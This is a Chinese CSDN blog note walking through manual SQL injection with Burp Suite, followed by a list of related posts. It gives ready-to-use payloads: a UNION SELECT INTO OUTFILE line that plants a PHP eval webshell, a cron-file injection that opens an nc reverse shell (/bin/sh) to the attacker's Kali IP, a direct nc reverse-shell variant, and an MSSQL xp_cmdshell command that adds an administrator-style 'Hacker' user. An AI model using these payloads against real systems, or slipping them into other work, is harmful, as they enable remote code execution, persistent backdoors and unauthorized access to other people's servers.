SQL手工注入

最新推荐文章于 2023-03-28 14:42:01 发布
最新推荐文章于 2023-03-28 14:42:01 发布
阅读量210 收藏
点赞数 2
分类专栏: 笔记 文章标签: mysql 安全 linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441727/article/details/114824540
版权

启动burpsuite监听网页

在监听到的页面右键点击Send to Repeater
在这里插入图片描述

然后跳转到Repeater
在这里插入图片描述在输入框输入【 ‘ "】
测试是否存在注入点

对username,password进行一个个试。如果存在会返回界面会不一样。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
当我们找到注入点
可以进行字符串猜解长度可以理解为是按照一列一列的查看密码的长度。
G9nLmNzZG4ubmV0L3dlaXhpbl80NTQ0MTcyNw==,size_16,color_FFFFFF,t_70)
在这里插入图片描述

‘order by 4#  报错
‘order by 3#页面正常

有3个字段

‘union select “”,””,”<?php eval($_GET[cmd]);?>” into outfile “/var/www/888.php”#
将php代码写入/var/www/html下的888。php
union一个操作符,必须SELECT语句组成。
/var/www/html网页文件的路径
into outfile导出多行数据,文件名必须全路径(绝对路径)
dumpfile功能一样但是只能导出一行数据

一句话木马详细解析

写一句话木马(基本操作)
得到webshell
whereis 查看命令的路径
查看nc命令的绝对路径

注当前此linux版本存在nc漏洞,可根据版本更改

更多漏洞

返回/usr/bin/nc.traditional
设定定时任务反弹shell
‘union select “”,””,”* * * * * root /usr/bin/nc.traditional kail的IP 监听端口 –c /bin/sh ” into outfile “/etc/cron.d/666”#
在这里插入图片描述

解析* * * * *分别对应 分 时 日 月 周 
这里利用的linux的系统定时任务

开启监听!!

一定要监听
nc -nlvp 监听端口等待一分钟后回弹。默认五个*是一分钟

直接连接

通过sys.exec命令来执行命令。

union select “”,””,”sys.exec(/usr/bin/nc.traditional  –c /bin/sh kail的IP  监听端口)”#

在这里插入图片描述

在这里插入图片描述

其他注入

03以上老版本使用

'exec master.dbo.xp_cmdshell 'net user Hacker P@ssword /add'--
Marx_Otto
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql手工注入
橙子的博客
01-02 754
原理 利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 重点部份手工注入网站: 1:开发一个注入网页漏洞。(产生机理…,如何去挖掘一个网站注入漏洞) A:创建数据库的后台(加入数据) mysql> create database infor...
手工操作几种常见SQL注入
最新发布
X1DD1Asad343的博客
06-20 1003
是一种结合数据库原始报错信息和union查询的注入方式使用场景:数据库中查询的结果能够直接在前端页面中展示出来。
SQL注入手工注入
Eternity18的博客
12-02 2155
web渗透测试的sql注入手工注入
SQL 手工注入
热门推荐
枫梓林のBlog
04-25 1万+
SQL 手工注入 文章目录SQL 手工注入0x01 SQL注入概述0x02 SQL 注入原理1.基本概述2.单引号的作用3.SQL 注入流程4.SQL 注入的基本分类3.常见注入方式分类0x03 部署 sqli-labs 学习环境1.sqli-labs 简介2.部署sqli-labs 实验环境2.1 搭建LAMP 环境2.2 检查安装的状态和启动服务2.3 配置 mysq 数据库 root 用户密码2.4 安装 sqli-labs 教学环境2.5 创建快照0x04 安装 hackbar 插件0x05 SQL
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
SQL手工注入完全篇
09-08
SQL手工注入是网络安全领域中的一个重要话题,主要涉及的是利用数据库查询语句的漏洞来非法获取或篡改数据库信息。在本完全篇中,我们将深入探讨SQL注入的基本原理、常见手法、防范措施以及如何进行安全编码。 一、...
SQL手工注入实例
01-04
这个“SQL手工注入实例”旨在帮助我们深入理解这一概念,并通过实践来提升对注入攻击的认识。 首先,让我们理解SQL注入的基础。在Web应用中,用户输入的数据通常会被用于构建动态的SQL查询。例如,一个登录页面可能...
网站初级SQL手工注入
05-01
### 知识点一:网站初级SQL手工注入基础概念 SQL手工注入是一种常见的Web安全漏洞利用方式,通过向应用程序提交恶意SQL代码来获取敏感信息、修改数据或控制系统。本知识点将详细阐述SQL手工注入的基本原理及其操作...
SQL 手工注入 变形上传拿shell
10-21
### SQL手工注入与变形上传获取Shell详解 #### 引言:深入理解SQL注入与Web安全 在网络安全领域,SQL注入是一种常见的攻击手段,利用Web应用对用户输入数据处理不当的漏洞,恶意插入或拼接SQL代码,从而实现对...
SQL注入
aiquan9342的博客
11-22 147
1.判断是否有注入;and 1=1;and 1=2 2.初步判断是否是mssql;and user>0 3.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access 4.注入参数是字符'and [查询条件] and ''=' ...
sql的手动注入
m0_62691847的博客
03-28 268
union select table_name,1 from information_schema.tables where table_schema=’库名’##获取users表中user_id,user,password,分为2列显示。#如何获取多个字段?#结果:直到不报语法错误,就确认了结果是几个字段。#解决user和password拼接在一起的问题。·获取数据库下所有的表。:获取user表中所有的用户名和密码。·获取表中所有的数据。(dvwa.users是表名)(dvwa.users是表名)
SQL注入手工注入
weixin_44906495的博客
04-20 511
SQL注入注入的手法或者工具上分类的话可以分为:     ·手工注入(手工来构造调试输入payload)   ·工具注入(使用工具,如sqlmap) 今天就给大家说一下手工注入:    手工注入流程 判断注入注入的第一步是得判断该处是否是一个注入点。或者说判断此处是否有SQL注入漏洞。最简单的判断方法就是在正常的参数后加单引号'。id=1' 以看到数据库报错...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值